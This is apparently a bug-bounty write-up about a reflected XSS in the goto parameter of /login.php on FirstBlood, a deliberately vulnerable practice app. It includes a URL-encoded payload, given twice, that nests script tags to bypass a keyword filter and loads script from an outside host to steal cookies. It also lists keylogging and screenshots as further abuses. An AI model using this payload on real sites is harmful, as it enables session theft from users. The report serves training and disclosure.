FirstBlood-#751XSS on login page
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-28, 2022isnew Level 2 reported:

Summary

  1. By reading the V1 report, I found that the landing page has a goto parameter that can XSS

  2. I tried the fuzz parameter myself, but fuzzing out the goto parameter showed 503

  3. Note: It is best to Fuzz XSS Payload, so you may not get the best results. You need to analyze and test it yourself step by step to be able to do so.

Steps

  1. A simple argument to the goto parameter is found to be displayed under the dom tree

  2. Test JavaScrIpt:alert(0) -> found filtering () symbols

  3. Testing "><<script> -> found filtering <script> tags -> but strangely ">< doesn't filter, only blacklisted words.

  4. Keep testing <scri<script>pt> -> and find that this time there is no filtering.

  5. So the attacker can combine some special payloads to bypass the restriction to occur xss. And after loading external js, the malicious code is not restricted by the server.

testgo%22%3E%3Cscri%3Cscript%3Ept%20src=//johnstone.xss.ht%3E%3C/sc%3C/script%3Eript%3E
  1. Send this link to the logged-in user and found that the user's cookie was successfully stolen

Vulnerability Exploitation

  1. If you can load external js you can write a lot of js code, you can not be restricted by the browser address, in addition to stealing the value of cookies, you can also take a screenshot of the user of the page to send to the attacker, you can also listen to the victim's keyboard keys and so on.

Suggestions for fixing

  1. Encode HTML entities for <>

  2. Add <> to the blacklist.

Study reference materials

  1. https://www.bugbountyhunter.com/vulnerability/?type=xss

  2. https://book.hacktricks.xyz/pentesting-web/xssi-cross-site-script-inclusion

P3 Medium

Endpoint: /login.php

Parameter: goto

Payload: testgo%22%3E%3Cscri%3Cscript%3Ept%20src=//johnstone.xss.ht%3E%3C/sc%3C/script%3Eript%3E


FirstBlood ID: 26
Vulnerability Type: Reflective XSS

The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.